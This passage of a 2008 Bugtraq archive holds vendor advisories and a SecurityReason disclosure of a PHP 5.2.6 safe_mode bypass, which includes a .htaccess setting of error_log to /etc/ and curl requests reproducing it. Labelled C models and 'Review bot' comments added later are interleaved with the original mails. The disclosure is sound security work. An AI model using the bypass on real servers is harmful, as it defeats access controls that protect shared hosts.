http://marc.info/?l=linux-netdev&m2841256115780&w=2

V. Credit

Hugo Dias - hdias [at] synchlabs [dot] com


VI. History

2008/11/14 - Vulnerability Discovered
2008/11/28 - Reported to vendor
2008/12/05 - Vendor Released Patch
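Added example (a userspace model of my own, not the kernel's net/atm code and not the poster's): the vcc hash bucket as an intrusive singly linked list, where linking the same socket twice makes it point at itself, and the quoted try_again loop, which for the pvc view never decrements its position counter and so never leaves the cycle. The `linked` flag, the step bound on the walker and the Floyd cycle check are assumptions of this model; the kernel's actual fix is at the URL under IV. Patch.

```c
/* Userspace model of the vcc table corruption: linking one socket twice into an
 * intrusive singly linked bucket makes it point at itself, and the proc walker
 * quoted above then never terminates. Added example, not kernel code. */
#include <errno.h>
#include <stddef.h>
#ifndef EUNATCH
#define EUNATCH 49          /* Linux errno value; not every libc defines it */
#endif
#define PF_ATMPVC 8         /* Linux address family numbers for ATM PVC / SVC */
#define PF_ATMSVC 20

struct sock {
    int family;             /* sk_family */
    int linked;             /* model-only flag: socket already in the table */
    struct sock *next;      /* intrusive list link, as in hlist */
};
struct vcc_bucket { struct sock *head; };

/* Same rule as the compare_family() quoted above: family 0 matches everything. */
static int compare_family(const struct sock *sk, int family) {
    return !family || (sk->family == family);
}

/* Unconditional push at the bucket head, like hlist_add_head(): pushing the
 * node that is already the head sets node->next = node, a one-node cycle. */
static void vcc_insert_socket(struct vcc_bucket *b, struct sock *sk) {
    sk->next = b->head;
    b->head = sk;
}

/* Unguarded listen: the socket is linked before the signalling-daemon check,
 * so with no daemon the caller gets -EUNATCH, the entry stays linked, and a
 * second call links it again, matching the post's observation. */
static int svc_listen_unguarded(struct vcc_bucket *b, struct sock *sk, int sigd) {
    vcc_insert_socket(b, sk);
    return sigd ? 0 : -EUNATCH;
}

/* Guarded listen (this model's own check): never link the same socket twice. */
static int svc_listen_guarded(struct vcc_bucket *b, struct sock *sk, int sigd) {
    if (sk->linked)
        return -EINVAL;
    sk->linked = 1;
    vcc_insert_socket(b, sk);
    return sigd ? 0 : -EUNATCH;
}

/* The quoted try_again loop: step through the bucket, decrement l for every
 * socket matching family, stop once l < 0. max_steps is added so the model
 * returns -1 where the real, unbounded loop would spin forever; otherwise
 * the number of list steps taken is returned. */
static long vcc_walk(const struct vcc_bucket *b, int family, long l, long max_steps) {
    long steps = 0;
    for (const struct sock *sk = b->head; sk; sk = sk->next) {
        if (++steps > max_steps)
            return -1;
        l -= compare_family(sk, family);
        if (l < 0)
            return steps;
    }
    return steps;
}

/* Floyd cycle check: a bounded way for a walker to reject a corrupted bucket. */
static int bucket_has_cycle(const struct vcc_bucket *b) {
    const struct sock *slow = b->head, *fast = b->head;
    while (fast && fast->next) {
        slow = slow->next;
        fast = fast->next->next;
        if (slow == fast)
            return 1;
    }
    return 0;
}

/* Two listen() calls on one SVC socket while no signalling daemon is present. */
static void double_listen(struct vcc_bucket *b, struct sock *svc, int guarded) {
    int (*do_listen)(struct vcc_bucket *, struct sock *, int) =
        guarded ? svc_listen_guarded : svc_listen_unguarded;
    do_listen(b, svc, 0);
    do_listen(b, svc, 0);
}

/* Read the table as /proc/net/atm/pvc (family PF_ATMPVC) or /proc/net/atm/vc
 * (family 0) would, for seq position l. Returns -1 where the walker would hang. */
static long scenario(int guarded, int family, long l, long max_steps) {
    struct vcc_bucket bucket = { NULL };
    struct sock svc = { PF_ATMSVC, 0, NULL };
    double_listen(&bucket, &svc, guarded);
    return vcc_walk(&bucket, family, l, max_steps);
}

static int scenario_has_cycle(int guarded) {
    struct vcc_bucket bucket = { NULL };
    struct sock svc = { PF_ATMSVC, 0, NULL };
    double_listen(&bucket, &svc, guarded);
    return bucket_has_cycle(&bucket);
}
```

The vc view (family 0) terminates but shows the same socket on every row, which is the repeated "Unassigned" address in the post; the pvc view never matches the SVC socket and so never returns.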

Date: 5 Dec 2008 16:17:59 -0000
Message-ID: <20081205161759.26183.qmail@securityfocus.com>
From: VulnerabilityAlert@ddifrontline.com
To: bugtraq@securityfocus.com
Subject: RE: DDIVRT-DDIVRT-2008-15 iPhone Configuration Web Utility 1.0 for Windows Directory Traversal

Solution Description - Update
-----------------------------
Apple has fixed this issue and uploaded a new version of this product to their website.  They have not changed the version information or announced the new release, but the flaw is fixed.

Date: Sat, 6 Dec 2008 15:47:14 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: cxib@securityreason.com
Cc: bugtraq@securityfocus.com, ilia@php.net
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Message-ID: <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <20081127235444.12197.qmail@securityfocus.com>

Maksymilian, Ilia, good day.

Thu, Nov 27, 2008 at 11:54:44PM -0000, cxib@securityreason.com wrote:
> [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
[...]
> - --- 1. dba_replace() destroying file ---

> Function dba_replace() is not filtering the key and value strings. There
> is a possibility of destruction of the file.

This vulnerability exists in the 4.x line as well and it is still unpatched.
I had verified it for the dba extension from 4.4.9.

According to the revision log,
  http://cvs.php.net/viewvc.cgi/php-src/ext/dba/libinifile/inifile.c?view=log&pathrev
there is no fix in the official PHP tree for 4.x yet.
-- 
Eygene

Cc: Maksymilian Arciemowicz <cxib@securityreason.com>,
bugtraq@securityfocus.com
Message-Id: <32F17A8E-60FA-444F-AD8D-C0B5BDCD826F@prohost.org>
From: Ilia Alshanetsky <ilia@prohost.org>
To: Eygene Ryabinkin <rea-sec@codelabs.ru>
In-Reply-To: <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Date: Sat, 6 Dec 2008 10:00:14 -0500
References: <20081127235444.12197.qmail@securityfocus.com> <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>

The PHP 4.X tree has been discontinued and all users should upgrade to  
the 5.x tree.


On 6-Dec-08, at 7:47 AM, Eygene Ryabinkin wrote:

> Maksymilian, Ilia, good day.
>
> Thu, Nov 27, 2008 at 11:54:44PM -0000, cxib@securityreason.com wrote:
>> [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
> [...]
>> - --- 1. dba_replace() destroying file ---
>>
>> Function dba_replace() is not filtering the key and value strings. There
>> is a possibility of destruction of the file.
>
> This vulnerability exists in the 4.x line as well and it is still
> unpatched.
> I had verified it for the dba extension from 4.4.9.
>
> According to the revision log,
>   http://cvs.php.net/viewvc.cgi/php-src/ext/dba/libinifile/inifile.c?view=log&pathrev
> there is no fix in the official PHP tree for 4.x yet.
> -- 
> Eygene

Ilia Alshanetsky




To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:239 ] clamav
Date: Fri, 05 Dec 2008 19:42:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1L8n7I-0004as-5J@titan.mandriva.com>

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:239
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : clamav
 Date    : December 5, 2008
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Ilja van Sprundel found that ClamAV contained a denial of service
 vulnerability in how it handled processing JPEG files, due to it
 not limiting the recursion depth when processing JPEG thumbnails
 (CVE-2008-5314).
 
 Other bugs have also been corrected in 0.94.2 which is being provided
 with this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314
 _______________________________________________________________________

 Updated Packages:

 _______________________________________________________________________


Date: Sat, 6 Dec 2008 20:48:05 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: Ilia Alshanetsky <ilia@prohost.org>
Cc: Maksymilian Arciemowicz <cxib@securityreason.com>,
bugtraq@securityfocus.com
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Message-ID: <DL5tOxkrW0n9ovGfT03KXUCfCn4@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <20081127235444.12197.qmail@securityfocus.com> <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0> <32F17A8E-60FA-444F-AD8D-C0B5BDCD826F@prohost.org>

Ilia, good day.

Sat, Dec 06, 2008 at 10:00:14AM -0500, Ilia Alshanetsky wrote:
> The PHP 4.X tree has been discontinued and all users should upgrade to  
> the 5.x tree.

Ah, I see -- it is even written in red on the official site.  Thanks for
the clarification.

But still, as some vendors are providing 4.x, maybe the advisory should
mention it as well?

Thanks.
-- 
Eygene

Date: Sat, 6 Dec 2008 12:40:48 -0700
Message-Id: <200812061940.mB6JemE5002856@www5.securityfocus.com>
From: cxib@securityreason.com
To: bugtraq@securityfocus.com
Subject: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload

[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- Written: 20.11.2008
- Public: 05.12.2008

SecurityReason Research
SecurityAlert Id: 59

SecurityRisk: High

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://pl.php.net/manual/pl/refs.utilspec.server.php

--- 1. PHP 5.2.6 SAPI php_getuid() overload ---

Using PHP 5.2.6 as an Apache module, one can bypass many security points. To understand this issue, first we need to know where the problem is.

127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x  2 www  www  512 Sep 10 03:49 .
drwxr-xr-x  4 www  www  512 Sep 10 03:41 ..
-rw-r--r--  1 www  www   26 Sep 10 03:49 .htaccess
-rw-r--r--  1 www  www   33 Sep 10 03:49 not.php
-rw-r--r--  1 www  www  107 Sep 10 03:49 pufff.php
-rw-r--r--  1 www  www   27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value       error_log       /etc/
127# cat not.php
<?php
    echo "only echo\n";
?>
127# cat pufff.php
<?php
    echo "safe_mode=".ini_get("safe_mode")."\n";
    echo "error_log=".ini_get("error_log")."\n";
?>
127# cat sleep.php
<?php
    sleep(60*2); 
?>
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127#

Now error_log is empty

Example exploit:

127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/


Any new "apache child" process allows the environment, like error_log, to be overloaded.


127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127#

So what is wrong?

Let's try to understand this problem. Let's start with the difference between

www   6361  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd

and 

www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd

RSS: 14288-14248 = 40

memory leak? No.

In the first request, we have declared error_log via .htaccess.

- --- main/main.c ---
..
STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog, error_log, php_core_globals, core_globals)
..
- --- main/main.c ---


goto OnUpdateErrorLog


- --- main/main.c ---
..
static PHP_INI_MH(OnUpdateErrorLog)
{
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS) &&
strcmp(new_value, "syslog")) {
if (PG(safe_mode) && (!php_checkuid(new_value, NULL, CHECKUID_CHECK_FILE_AND_DIR))) {
return FAILURE;
}

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC)) {
return FAILURE;
}

}
OnUpdateString(entry, new_value, new_value_length, mh_arg1, mh_arg2, mh_arg3, stage TSRMLS_CC);
return SUCCESS;
}
..
- --- main/main.c ---


(!php_checkuid(new_value, NULL, CHECKUID_CHECK_FILE_AND_DIR)) <==> False

deeper into safe_mode.c, function php_checkuid()


- --- main/safe_mode.c ---
..
uid = sb.st_uid;
gid = sb.st_gid;
if (uid == php_getuid()) {
return 1;
..
duid = sb.st_uid;
dgid = sb.st_gid;
if (duid == php_getuid()) {
..
- --- main/safe_mode.c ---


php_getuid() does not return the correct value at the time of checking safe_mode
for "/etc/"

First request
uid = php_getuid() <==> True
0 <=> uid <=> php_getuid() <==> True

Next request:
uid = php_getuid() <==> False
0 <=> 80 <==> False

because
80 (www uid) = php_getuid()
0 = uid (/etc/ owned by root)


- --- ext/standard/pageinfo.h ---
..
extern long php_getuid(void);
..
- --- ext/standard/pageinfo.h ---

- --- ext/standard/pageinfo.c ---
..
long php_getuid(void)
{
TSRMLS_FETCH();

php_statpage(TSRMLS_C);
return (BG(page_uid));
}
..
- --- ext/standard/pageinfo.c ---

- --- ext/standard/pageinfo.c ---
..
pstat = sapi_get_stat(TSRMLS_C);

if (BG(page_uid)==-1 || BG(page_gid)==-1) {
if(pstat) {
BG(page_uid)   = pstat->st_uid;
..
- --- ext/standard/pageinfo.c ---


php_getuid() will return the correct value after the first request.

Let's look at SAPI.c


- --- SAPI.c ---
..
SAPI_API struct stat *sapi_get_stat(TSRMLS_D)
{
if (sapi_module.get_stat) {
return sapi_module.get_stat(TSRMLS_C);
..
- --- SAPI.c ---


for apache 1.3.41, mod_php5.c

- --- mod_php5.c ---
..
/* {{{ php_apache_get_stat
 */
static struct stat *php_apache_get_stat(TSRMLS_D)
{
return &((request_rec *) SG(server_context))->finfo;
}
..
- --- mod_php5.c ---

SG(server_context) <=> 0x0

The same situation in sapi_apache2.c for Apache2.


Where is the problem? In:

if (BG(page_uid)==-1 || BG(page_gid)==-1) 

For variables in .htaccess, BG(page_uid) isn't set.


(BG(page_uid)==-1 || BG(page_gid)==-1) <==> False

=>

( BG(page_uid) <=> 0 <=> BG(page_gid) ) <==> True



uid(0) <=> root

for the values of the .htaccess


This analysis was for the variable error_log. We cannot determine all the possible uses of this error.

There are other potential uses of this issue. SecurityReason is not going to release an official exploit to the general public.

- --- 2. How to fix (proof) ---
5.2.7

proof:

0 Step. Add, into main/main.c
- --
static PHP_INI_MH(OnUpdateErrorLog)
{
/* Only do the safemode/open_basedir check at runtime */
+ BG(page_uid)=-2; // -2 isnt registred 
+ BG(page_gid)=-2; // -2 isnt registred
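Review bot: the two sentinel assignments sit above the `stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS` test, so they also run for a runtime ini_set('error_log', ...) in a script whose page_uid/page_gid were already filled from the request stat, and the next php_getuid() re-resolves through the -2 path instead of keeping the file-owner value; guard them with the same stage test, or restrict them to PHP_INI_STAGE_HTACCESS, which is the case the analysis is about. The `//` comments ("isnt registred") also do not match the `/* */` style of the surrounding main/main.c code, and `-2` should be a named constant since pageinfo.c has to agree on it.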
- --

1 Step. Add, into pageinfo.c, end of the main loop in php_statpage()
- ---
- - }
+ } else if (BG(page_uid)==-2 || BG(page_gid)==-2) {
+ BG(page_uid) = getuid();
+ BG(page_gid) = getgid();
+ }
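Review bot: this branch resolves the identity from getuid()/getgid(), the Apache worker's process uid (80 here), while the existing -1 branch takes the page owner from sapi_get_stat(), so the safe_mode comparison for .htaccess-stage values silently changes from script owner to server user; say so explicitly next to the code. The hunk also omits the `if` it extends, so a reader cannot see that the new branch runs only when the -1 branch did not. A more conservative choice is a final else that leaves page_uid/page_gid untouched: with no file owner equal to -1, `uid == php_getuid()` in php_checkuid() then fails closed. The author's own note that this covers only error_log in .htaccess points at the real fix, resetting the sentinel where BG is zeroed in a fresh child rather than inside one INI handler.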
- ---

It is a fix ONLY for error_log in .htaccess.

Official fix
http://cvs.php.net/viewvc.cgi/php-src/sapi/apache/mod_php5.c?r1=1.19.2.7.2.15&r2=1.19.2.7.2.16&diff_format=u
http://cvs.php.net/viewvc.cgi/php-src/ext/standard/basic_functions.c?r1=1.725.2.31.2.78&r2=1.725.2.31.2.79&diff_format=u
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1340&r2=1.2027.2.547.2.1341&diff_format=u

- --- 3. Greets ---
Stanislav Malyshev sp3x Chujwamwdupe p_e_a schain pi3 Infospec

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAkk5OIQACgkQpiCeOKaYa9a95wCgiTT2Fl6SNQbFDnHWyQTtlkG8
g0gAoJzijUB94mtnCGlK/7/cFDw9R2gD
=Q0rV
-----END PGP SIGNATURE-----
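A constructed C model of the lazily initialised page_uid/page_gid state traced in the advisory above, added here as an example; it is neither PHP's code nor SecurityReason's proof. It assumes stand-ins for BG(), the SAPI stat and the ownership test from php_checkuid(), a www uid of 80 (from the ps output) and a root-owned target such as /etc/. It reproduces why a fresh child's zero-initialised globals let the check pass before RINIT has set the -1 sentinel, and shows one hardened variant: the sentinel is present from the start and, when no request stat exists yet, the process identity is used (the route the proof takes), so the same check fails closed.

```c
#include <stdio.h>

/* Constructed stand-ins for PHP's basic_globals and the SAPI's struct stat. */
struct basic_globals { long page_uid; long page_gid; };
struct stat_info     { long st_uid;   long st_gid;   };

#define UID_UNSET   (-1L)   /* the sentinel php_statpage() tests for          */
#define PROCESS_UID 80L     /* the www user from the ps output (assumption)   */
#define PROCESS_GID 80L
#define ROOT_UID    0L      /* owner of /etc/                                 */

/* Mirrors the visible part of php_statpage(): refresh page_uid/page_gid only
 * when the sentinel is present, and only if the SAPI can supply a stat. */
static void statpage_model(struct basic_globals *bg, const struct stat_info *req)
{
    if (bg->page_uid == UID_UNSET || bg->page_gid == UID_UNSET) {
        if (req) {
            bg->page_uid = req->st_uid;
            bg->page_gid = req->st_gid;
        }
    }
}

/* php_getuid() stand-in: whatever page_uid holds after statpage ran. */
static long getuid_model(struct basic_globals *bg, const struct stat_info *req)
{
    statpage_model(bg, req);
    return bg->page_uid;
}

/* The ownership test from php_checkuid(): 1 = allowed, 0 = denied. */
static int checkuid_model(struct basic_globals *bg, const struct stat_info *req,
                          long file_uid)
{
    return file_uid == getuid_model(bg, req);
}

/* Hardened variant: the sentinel is initialised before any .htaccess-stage
 * check, and with no request stat the process identity is used instead of
 * leaving a zero (root) in place. */
static void statpage_hardened(struct basic_globals *bg, const struct stat_info *req)
{
    if (bg->page_uid == UID_UNSET || bg->page_gid == UID_UNSET) {
        if (req) {
            bg->page_uid = req->st_uid;
            bg->page_gid = req->st_gid;
        } else {
            bg->page_uid = PROCESS_UID;
            bg->page_gid = PROCESS_GID;
        }
    }
}

static int checkuid_hardened(struct basic_globals *bg, const struct stat_info *req,
                             long file_uid)
{
    statpage_hardened(bg, req);
    return file_uid == bg->page_uid;
}

/* Scenario 1 (the bug): fresh child at .htaccess stage, globals still zeroed,
 * no request stat yet. error_log=/etc/ (owner uid 0) is accepted. */
int demo_buggy_fresh_child(void)
{
    struct basic_globals bg = { 0, 0 };
    return checkuid_model(&bg, NULL, ROOT_UID);      /* 1: wrongly allowed */
}

/* Scenario 2: a later request in the same child. RINIT has set the sentinel
 * and the script's stat (owned by www) is available. */
int demo_buggy_after_rinit(void)
{
    struct basic_globals bg = { UID_UNSET, UID_UNSET };
    struct stat_info script = { PROCESS_UID, PROCESS_GID };
    return checkuid_model(&bg, &script, ROOT_UID);   /* 0: denied, 0 != 80 */
}

/* Scenario 3: hardened path in a fresh child; root-owned target denied,
 * www-owned target still allowed. */
int demo_hardened_fresh_child(long file_uid)
{
    struct basic_globals bg = { UID_UNSET, UID_UNSET };
    return checkuid_hardened(&bg, NULL, file_uid);
}

int main(void)
{
    printf("fresh child, buggy   : %d\n", demo_buggy_fresh_child());
    printf("after RINIT, buggy   : %d\n", demo_buggy_after_rinit());
    printf("fresh child, hardened: root %d, www %d\n",
           demo_hardened_fresh_child(ROOT_UID),
           demo_hardened_fresh_child(PROCESS_UID));
    return 0;
}
```

Scenario 2 is the "next request" case from the advisory: once the sentinel is -1 and the script's stat is available, the root-owned directory is refused. An alternative to the process-uid fallback is to leave the sentinel untouched when no stat is available; that also fails closed, because no file owner equals -1.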

From - Mon Dec  8 10:49:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004efe
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38846-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B5BB3ECAE9
for <lists@securityspace.com>; Mon,  8 Dec 2008 10:47:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 428DA236FDD; Mon,  8 Dec 2008 08:32:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29387 invoked from network); 7 Dec 2008 16:06:12 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
Message-Id: <20081207162255.3BC36327719@morgana.loeki.tv>
Date: Sun,  7 Dec 2008 17:22:55 +0100 (CET)
From: thijs@debian.org (Thijs Kinkhorst)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1682-1] New squirrelmail packages fix cross site scripting
Priority: urgent
Resent-Message-ID: <OFtfSt__IxE.A.4PC.mh_OJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun,  7 Dec 2008 16:23:02 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1682-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 07, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : squirrelmail
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-2379

Ivan Markovic discovered that SquirrelMail, a webmail application, did not
sufficiently sanitise incoming HTML email, allowing an attacker to perform
cross site scripting through sending a malicious HTML email.

For the stable distribution (etch), this problem has been fixed in
version 1.4.9a-3.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.15-4.

We recommend that you upgrade your squirrelmail package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3.diff.gz
    Size/MD5 checksum:    23420 b1755b11f721f2bdc7c5a100cf83f1d6
  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a.orig.tar.gz
    Size/MD5 checksum:   598950 5b19f8cc5badef91d1f2410df41564bc
  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3.dsc
    Size/MD5 checksum:     1021 9954f8522b7059cb115f5a77405c298f

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.9a-3_all.deb
    Size/MD5 checksum:   591892 35c2060553f375b9bd8759d06b401153


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSTv2wGz0hbPcukPfAQIIwgf+OFYz0lUhZHOXrbTGhw3Nd+eQujaYB+oR
fgtKT9WpHNP/lYdBtuSj6LouGH5sLMlCSaUGwzMGfuCOKqB1ghFKOaeB5Yu1Oe0i
0ZZiofVeUmGbU+lee8l4Z11Okwg1Ck4/4raHrA06hpJnSno43o/JjVybXJr2pdGq
keYvtp5c2rhqr0kLqdpG9ZUPRnv69kstkHrWErPS8+/qRKewoSKN8N7KVeAd1Dva
Rx0ZHGc1ASJTPwMOaH/UiDFLxmS8weYnKkmWDk0mATN1qkXr6DZmHsQ2qMK7J+Eh
cWkSKTVNUtY2pk3Ka4I1ZmyyRoc1cZBmi6vs8Lo9EXK50m3VCgKojw==
=PwzV
-----END PGP SIGNATURE-----

From - Mon Dec  8 10:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f01
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38847-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id EBAA1ECDC0
for <lists@securityspace.com>; Mon,  8 Dec 2008 10:57:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3D155237005; Mon,  8 Dec 2008 08:33:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
